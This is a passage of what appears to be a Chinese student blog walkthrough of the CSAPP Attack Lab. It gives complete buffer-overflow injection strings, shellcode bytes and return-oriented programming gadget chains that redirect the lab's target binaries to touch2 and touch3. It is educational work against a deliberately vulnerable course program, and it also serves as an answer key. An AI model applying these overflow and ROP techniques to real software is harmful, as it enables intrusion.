<h4 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h4><p><strong>基本思路：</strong>test()调用getbuf()之后分配一个40字节的空间，要利用这个空间以及返回地址来运行touch2，并打印成功字符串。</p>
<p>首先观察这个touch2函数</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">touch2</span><span class="params">(<span class="type">unsigned</span> val)</span></span>&#123;</span><br><span class="line">    vlevel = <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">if</span> (val == cookie)&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Touch2!: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">        <span class="built_in">validate</span>(<span class="number">2</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line">        <span class="built_in">fail</span>(<span class="number">2</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>touch2有一个参数val，这个参数要等于cookie，cookie在每个人的压缩包里有，我的是0x59b997fa将cookie赋值为参数val，要有语句：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">movq <span class="number">0x59b997fa</span>,%rdi</span><br></pre></td></tr></table></figure>

<p>要运行函数touch2()，必须把它的起始地址push进栈中，我的lab中touch2起始地址为0x00000000004017ec（后续会讲怎么查），所以需要语句：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pushq <span class="number">0x4017ec</span></span><br></pre></td></tr></table></figure>

<p>最后需要从栈顶取值：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>因此，要注入的代码整体为：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">movq  $<span class="number">0x59b997fa</span>,%rdi</span><br><span class="line">pushq $<span class="number">0x4017ec</span></span><br><span class="line">ret</span><br><span class="line">    </span><br><span class="line"><span class="comment">//汇编转化为可以执行的指令序列</span></span><br><span class="line"><span class="comment">//linux&gt; gcc -c inject.s</span></span><br><span class="line"><span class="comment">//linux&gt; objdump -d inject.o</span></span><br><span class="line"><span class="comment">//Disassembly of section .text:</span></span><br><span class="line"><span class="number">0000000000000000</span> &lt;.text&gt;:</span><br><span class="line">  <span class="number">8</span>    <span class="number">0</span>:   <span class="number">48</span> c7 c7 fa <span class="number">97</span> b9 <span class="number">59</span>    mov    $<span class="number">0x59b997fa</span>,%rdi</span><br><span class="line">  <span class="number">9</span>    <span class="number">7</span>:   <span class="number">68</span> ec <span class="number">17</span> <span class="number">40</span> <span class="number">00</span>          pushq  $<span class="number">0x4017ec</span></span><br><span class="line"> <span class="number">10</span>    c:   c3                      retq</span><br></pre></td></tr></table></figure>

<p>这三句汇编代码转化为机器码后填充getbuf函数申请的40个字节，空余的可以用00填充。</p>
<p>现在有一个<strong>问题</strong>：这一段代码注入在getbuf函数申请的空间之后怎么执行呢？</p>
<p><strong>解决</strong>：同样采取数组溢出的方法，溢出的部分填写注入代码的起始地址，也就是原getbuf申请的40个字节的起始地址，我的lab中这个地址是0x5561dc78（后面会讲怎么看）。</p>
<p>综合注入代码转化的十六进制代码和修改的返回地址，得到需要填入的代码如下：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">48</span> c7 c7 fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">68</span> ec <span class="number">17</span><span class="comment">//注入代码操作序列</span></span><br><span class="line"><span class="number">40</span> <span class="number">00</span> c3 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">78</span> dc <span class="number">61</span> <span class="number">55</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span><span class="comment">//注入代码起始地址</span></span><br></pre></td></tr></table></figure>

<p>答案输入形式：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">48</span> c7 c7 fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">68</span> ec <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> c3 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">78</span> dc <span class="number">61</span> <span class="number">55</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br></pre></td></tr></table></figure>

<p>字符串转化为字节码：.&#x2F;hex2raw &lt; p2.txt &gt; p2r.txt <strong>（！！！！莫名其妙这个语句生成的p2r.txt为空，所以暂时这个没有执行成功，只是理论上分析正确）→ （删除文件夹再解压之后可以了，可能是某些文件or代码被修改）</strong></p>
<p>执行命令：.&#x2F;ctarget -qi p2r.txt</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/10.jpg"></p>
<p>可以看到level2 PASS</p>
<p>查看touch2开始地址，注释部分即为起始地址：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//touch2对应的汇编</span></span><br><span class="line">(gdb) disas touch2</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function touch2:</span><br><span class="line">   <span class="number">0x00000000004017ec</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x8</span>,%rsp<span class="comment">//起始地址0x00000000004017ec</span></span><br><span class="line">   <span class="number">0x00000000004017f0</span> &lt;+<span class="number">4</span>&gt;:		mov    %edi,%edx</span><br><span class="line">   <span class="number">0x00000000004017f2</span> &lt;+<span class="number">6</span>&gt;:		movl   $<span class="number">0x2</span>,<span class="number">0x202ce0</span>(%rip)        # <span class="number">0x6044dc</span> &lt;vlevel&gt;</span><br><span class="line">   <span class="number">0x00000000004017fc</span> &lt;+<span class="number">16</span>&gt;:	cmp    <span class="number">0x202ce2</span>(%rip),%edi        # <span class="number">0x6044e4</span> &lt;cookie&gt;</span><br><span class="line">   <span class="number">0x0000000000401802</span> &lt;+<span class="number">22</span>&gt;:	jne    <span class="number">0x401824</span> &lt;touch2+<span class="number">56</span>&gt;</span><br><span class="line">   <span class="number">0x0000000000401804</span> &lt;+<span class="number">24</span>&gt;:	mov    $<span class="number">0x4030e8</span>,%esi</span><br><span class="line">   <span class="number">0x0000000000401809</span> &lt;+<span class="number">29</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x000000000040180e</span> &lt;+<span class="number">34</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401813</span> &lt;+<span class="number">39</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x0000000000401818</span> &lt;+<span class="number">44</span>&gt;:	mov    $<span class="number">0x2</span>,%edi</span><br><span class="line">   <span class="number">0x000000000040181d</span> &lt;+<span class="number">49</span>&gt;:	callq  <span class="number">0x401c8d</span> &lt;validate&gt;</span><br><span class="line">   <span class="number">0x0000000000401822</span> &lt;+<span class="number">54</span>&gt;:	jmp    <span class="number">0x401842</span> &lt;touch2+<span class="number">86</span>&gt;</span><br><span class="line">   <span class="number">0x0000000000401824</span> &lt;+<span class="number">56</span>&gt;:	mov    $<span class="number">0x403110</span>,%esi</span><br><span class="line">   <span class="number">0x0000000000401829</span> &lt;+<span class="number">61</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x000000000040182e</span> &lt;+<span class="number">66</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401833</span> &lt;+<span class="number">71</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x0000000000401838</span> &lt;+<span class="number">76</span>&gt;:	mov    $<span class="number">0x2</span>,%edi</span><br><span class="line">   <span class="number">0x000000000040183d</span> &lt;+<span class="number">81</span>&gt;:	callq  <span class="number">0x401d4f</span> &lt;fail&gt;</span><br><span class="line">   <span class="number">0x0000000000401842</span> &lt;+<span class="number">86</span>&gt;:	mov    $<span class="number">0x0</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401847</span> &lt;+<span class="number">91</span>&gt;:	callq  <span class="number">0x400e40</span> &lt;exit@plt&gt;</span><br></pre></td></tr></table></figure>

<p>找到注入代码的起始地址，也就是getbuf申请40字节值后的rsp值：</p>
<p>在getbuf处设置一个断点：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/11.jpg"></p>
<p>进入断点并单步调试后：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/12.jpg"></p>
<p>此时查看寄存器：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/13.jpg"></p>
<p>可以看到已经申请了40字节的空间，下一个要执行语句为0x00000000004017ac &lt;+4&gt;:	mov    %rsp,%rdi</p>
<p>此时%rsp值为0x5561dc78，是申请空间的起始值，也是注入代码的起始地址。</p>
<h4 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h4><p><strong>基本思路</strong>：目的是要调用touch3，然后输出成功语句。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">hexmatch</span><span class="params">(<span class="type">unsigned</span> val, <span class="type">char</span> *sval)</span></span>&#123;</span><br><span class="line">    <span class="type">char</span> cbuf[<span class="number">110</span>];</span><br><span class="line">    <span class="type">char</span> *s = cbuf + <span class="built_in">random</span>() % <span class="number">100</span>;</span><br><span class="line">    <span class="built_in">sprintf</span>(s, <span class="string">&quot;%.8x&quot;</span>, val);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">strncmp</span>(sval, s, <span class="number">9</span>) == <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">touch3</span><span class="params">(<span class="type">char</span> *sval)</span></span>&#123;</span><br><span class="line">    vlevel = <span class="number">3</span>;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">hexmatch</span>(cookie, sval))&#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Touch3!: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        <span class="built_in">validate</span>(<span class="number">3</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch3(\&quot;%s\&quot;)\n&quot;</span>, sval);</span><br><span class="line">        <span class="built_in">fail</span>(<span class="number">3</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//touch3对应汇编</span></span><br><span class="line">(gdb) disas touch3</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function touch3:</span><br><span class="line">   <span class="number">0x00000000004018fa</span> &lt;+<span class="number">0</span>&gt;:		push   %rbx<span class="comment">//起始地址</span></span><br><span class="line">   <span class="number">0x00000000004018fb</span> &lt;+<span class="number">1</span>&gt;:		mov    %rdi,%rbx</span><br><span class="line">   <span class="number">0x00000000004018fe</span> &lt;+<span class="number">4</span>&gt;:		movl   $<span class="number">0x3</span>,<span class="number">0x202bd4</span>(%rip)        # <span class="number">0x6044dc</span> &lt;vlevel&gt;</span><br><span class="line">   <span class="number">0x0000000000401908</span> &lt;+<span class="number">14</span>&gt;:	mov    %rdi,%rsi</span><br><span class="line">   <span class="number">0x000000000040190b</span> &lt;+<span class="number">17</span>&gt;:	mov    <span class="number">0x202bd3</span>(%rip),%edi        # <span class="number">0x6044e4</span> &lt;cookie&gt;</span><br><span class="line">   <span class="number">0x0000000000401911</span> &lt;+<span class="number">23</span>&gt;:	callq  <span class="number">0x40184c</span> &lt;hexmatch&gt;</span><br><span class="line">   <span class="number">0x0000000000401916</span> &lt;+<span class="number">28</span>&gt;:	test   %eax,%eax</span><br><span class="line">   <span class="number">0x0000000000401918</span> &lt;+<span class="number">30</span>&gt;:	je     <span class="number">0x40193d</span> &lt;touch3+<span class="number">67</span>&gt;</span><br><span class="line">   <span class="number">0x000000000040191a</span> &lt;+<span class="number">32</span>&gt;:	mov    %rbx,%rdx</span><br><span class="line">   <span class="number">0x000000000040191d</span> &lt;+<span class="number">35</span>&gt;:	mov    $<span class="number">0x403138</span>,%esi</span><br><span class="line">   <span class="number">0x0000000000401922</span> &lt;+<span class="number">40</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401927</span> &lt;+<span class="number">45</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x000000000040192c</span> &lt;+<span class="number">50</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x0000000000401931</span> &lt;+<span class="number">55</span>&gt;:	mov    $<span class="number">0x3</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401936</span> &lt;+<span class="number">60</span>&gt;:	callq  <span class="number">0x401c8d</span> &lt;validate&gt;</span><br><span class="line">   <span class="number">0x000000000040193b</span> &lt;+<span class="number">65</span>&gt;:	jmp    <span class="number">0x40195e</span> &lt;touch3+<span class="number">100</span>&gt;</span><br><span class="line">   <span class="number">0x000000000040193d</span> &lt;+<span class="number">67</span>&gt;:	mov    %rbx,%rdx</span><br><span class="line">   <span class="number">0x0000000000401940</span> &lt;+<span class="number">70</span>&gt;:	mov    $<span class="number">0x403160</span>,%esi</span><br><span class="line">   <span class="number">0x0000000000401945</span> &lt;+<span class="number">75</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x000000000040194a</span> &lt;+<span class="number">80</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x000000000040194f</span> &lt;+<span class="number">85</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x0000000000401954</span> &lt;+<span class="number">90</span>&gt;:	mov    $<span class="number">0x3</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401959</span> &lt;+<span class="number">95</span>&gt;:	callq  <span class="number">0x401d4f</span> &lt;fail&gt;</span><br><span class="line">   <span class="number">0x000000000040195e</span> &lt;+<span class="number">100</span>&gt;:	mov    $<span class="number">0x0</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401963</span> &lt;+<span class="number">105</span>&gt;:	callq  <span class="number">0x400e40</span> &lt;exit@plt&gt;</span><br><span class="line">End of assembler dump.</span><br></pre></td></tr></table></figure>

<p>看touch3代码可以知道还要调用一个函数hexmatch，这个函数在文档中的解释是比较一个字符串和一个十六进制表示值是否相等，只有相等才可以正确调用并打印成功语句。在touch3代码中传入的十六进制值是cookie，传入的字符串是它的地址，这个地址也是touch3的参数。</p>
<p>我的文档中cookie是0x59b997fa，所以传进去的参数是”59b997fa”，需要注意：字符串有一个默认结尾”\0”，使用man ascii命令可以得到ascii码和十六进制表示之间的对应关系。得到”59b997fa”对应十六进制表示：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">35</span> <span class="number">39</span> <span class="number">62</span> <span class="number">39</span> <span class="number">39</span> <span class="number">37</span> <span class="number">66</span> <span class="number">61</span> <span class="number">00</span></span><br></pre></td></tr></table></figure>

<p>我们要把这个十六进制序列存入内存中的某个位置，然后把这位置的地址赋值为%rdi（文档中要求的寄存器），作为touch3调用的参数进行运算。因为hexmatch中地址随机开始一个地方，可能覆盖getbuf中的某个位置，所以保险做法是利用test栈帧中的空间来存这个序列。</p>
<p>根据level2可以知道getbuf分配了40个字节的空间，填满这40个字节空间后有一个8字节的rsp返回地址空间，这个rsp可以利用数组溢出填充分配给getbuf函数的40个字节的起始地址，从而运行我们填充在getbuf的空间内的机器指令。</p>
<p>也就是说，getbuf分配空间之后的地址+48字节就是原test栈中的地址，这个地址不会被覆盖。如下所示，分配40字节后%rsp&#x3D;0x5561dc78（要填入返回地址中），+48字节应该为0x5561dca8（存放十六进制串），所以应该将十六进制序列存入这个地址。</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/14.jpg"></p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/15.jpg"></p>
<p>对应语句：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">movq $<span class="number">0x5561dca8</span>, %rdi</span><br></pre></td></tr></table></figure>

<p>再类似于level2处理，将touch3的起始地址（汇编代码中有）放入栈中，并调用：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pushq <span class="number">0x4018fa</span></span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>所以综合语句：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movq $<span class="number">0x5561dca8</span>, %rdi</span><br><span class="line">pushq $<span class="number">0x4018fa</span></span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>汇编和反汇编的结果：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gcc -c inject3.s</span><br><span class="line">objdump -d inject3.o</span><br><span class="line"></span><br><span class="line"><span class="number">0000000000000000</span> &lt;.text&gt;:</span><br><span class="line">   <span class="number">0</span>:	<span class="number">48</span> c7 c7 a8 dc <span class="number">61</span> <span class="number">55</span> 	mov    $<span class="number">0x5561dca8</span>,%rdi</span><br><span class="line">   <span class="number">7</span>:	<span class="number">68</span> fa <span class="number">18</span> <span class="number">40</span> <span class="number">00</span>       	pushq  $<span class="number">0x4018fa</span></span><br><span class="line">   c:	c3                   	retq </span><br></pre></td></tr></table></figure>

<p>所以最终答案：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//用合适语句及00填充40字节</span></span><br><span class="line"><span class="number">48</span> c7 c7 a8 dc <span class="number">61</span> <span class="number">55</span> <span class="number">68</span> fa <span class="number">18</span></span><br><span class="line"><span class="number">40</span> <span class="number">00</span> c3 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="comment">//讲getbuf缓存起始地址填入返回地址中</span></span><br><span class="line"><span class="number">78</span> dc <span class="number">61</span> <span class="number">55</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="comment">//十六进制串</span></span><br><span class="line"><span class="number">35</span> <span class="number">39</span> <span class="number">62</span> <span class="number">39</span> <span class="number">39</span> <span class="number">37</span> <span class="number">66</span> <span class="number">61</span> <span class="number">00</span></span><br></pre></td></tr></table></figure>

<p>可以看到成功PASS：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/16.jpg"></p>
<h3 id="ROP-Return-Oriented-Programming-攻击"><a href="#ROP-Return-Oriented-Programming-攻击" class="headerlink" title="ROP(Return-Oriented Programming)攻击"></a>ROP(Return-Oriented Programming)攻击</h3><p>首先明确代码注入攻击的重点在于缓存区的代码可以被执行而且栈的位置不随机，所以可以确定每次跳转的地址，然后运行缓存区内的代码，从而执行一些注入的程序。</p>
<p>但是rtarget中针对上述，有以下两个特点防止代码注入攻击：</p>
<ol>
<li>栈的位置每次随机，无法确定要跳转的地址</li>
<li>缓存区内的代码不可以执行，执行遇到段错误</li>
</ol>
<p>所以需要新的攻击方案：执行的代码在原来程序中已经有，但是在不同的位置，需要拼凑甚至“断章取义”汇编代码得到。</p>
<p>总的逻辑示意：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/17.jpg"></p>
<p>最开始执行rsp中的gadget1，此时rsp+&#x3D;0x8指向gadget2，然后ret(汇编代码c3)，开始执行gadget2，rsp指向gadget3……</p>
<p>所以我们可以将getbuf函数的缓存区存满之后一次性存入指向已有程序位置的代码执行攻击。</p>
<h4 id="level-2-1"><a href="#level-2-1" class="headerlink" title="level 2"></a>level 2</h4><p><strong>基本思路</strong>：这一部分要求完成代码注入攻击level 2同等内容的攻击。level 2中攻击需要传入参数cookie(0x59b997fa)，然后调用函数touch2。</p>
<p>首先因为缓存区内的代码不可以执行，所以全部用00填充。</p>
<p>原返回地址可以用一个新的地址覆盖，然后跳转执行这条新的指令。需要注意的是，getbuf函数最后有一条ret语句，会从取出栈顶位置并对寄存器做修改，也就是所以跳转到这条新指令的时候rsp+&#x3D;8，又往上移动了8个字节。</p>
<p>这个时候新语句正要执行，还没有执行，所以如果这个语句是一个取值语句或者pop语句（从rsp指向处读取信息到Dest中）就可以得到一个值。我们可以将cookie存在这个位置，然后用gadget1处的语句读取它到某一个寄存器中，然后用mov语句移动到rdi中。完成参数的赋值之后再跳转到touch3中执行。</p>
<p>再观察线索函数farm.s，先gcc -c farm.c生成farm.o文件，再通过objdump -d farm.o进行反汇编后（<strong>又带其起始地址又带汇编代码的语句，需要怎么获得还需要再探究，此处只写逻辑</strong>）从中寻找需要的语句。</p>
<p>可以找到</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>a7 &lt;addval_219&gt;:</span><br><span class="line">  <span class="number">4019</span>a7: <span class="number">8</span>d <span class="number">87</span> <span class="number">51</span> <span class="number">73</span> <span class="number">58</span> <span class="number">90</span>     lea    <span class="number">-0x6fa78caf</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>ad: c3 </span><br></pre></td></tr></table></figure>

<p>这里的 58 可以代表popq %rax语句，起始地址0x4019ab</p>
<p>以及</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00000000004019</span>a0 &lt;addval_273&gt;:</span><br><span class="line">  <span class="number">4019</span>a0: <span class="number">8</span>d <span class="number">87</span> <span class="number">48</span> <span class="number">89</span> c7 c3     lea    <span class="number">-0x3c3876b8</span>(%rdi),%eax</span><br><span class="line">  <span class="number">4019</span>a6: c3  </span><br></pre></td></tr></table></figure>

<p>可以得到语句movq %rax, %rdi，起始地址0x4019a2</p>
<p>所以根据思路分析得出的栈中内容：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/18.jpg"></p>
<p>答案如下：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//40字节填充</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">ab <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span><span class="comment">//popq %rax起始地址（gadget1）</span></span><br><span class="line">fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span><span class="comment">//cookie</span></span><br><span class="line">a2 <span class="number">19</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span><span class="comment">//movq %rax %rdi起始地址（gadget2）</span></span><br><span class="line">ec <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span><span class="comment">//touch2起始地址</span></span><br></pre></td></tr></table></figure>

<p>运行结果，成功PASS：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/19.jpg"></p>
<h4 id="level-3-1"><a href="#level-3-1" class="headerlink" title="level 3"></a>level 3</h4><p><strong>基本思路</strong>：根据ctarget中的level 3可以知道，需要将一个字符串转化后的十六进制序列存在一个地址中，然后把这个地址作为参数传给%rdi，再调用touch3函数。</p>
<p>所以核心逻辑语句（不一定能找到刚好的，但是最终目的）：</p>
<ol>
<li>movq 字符串首地址, %rdi</li>
<li>touch3首地址</li>
</ol>
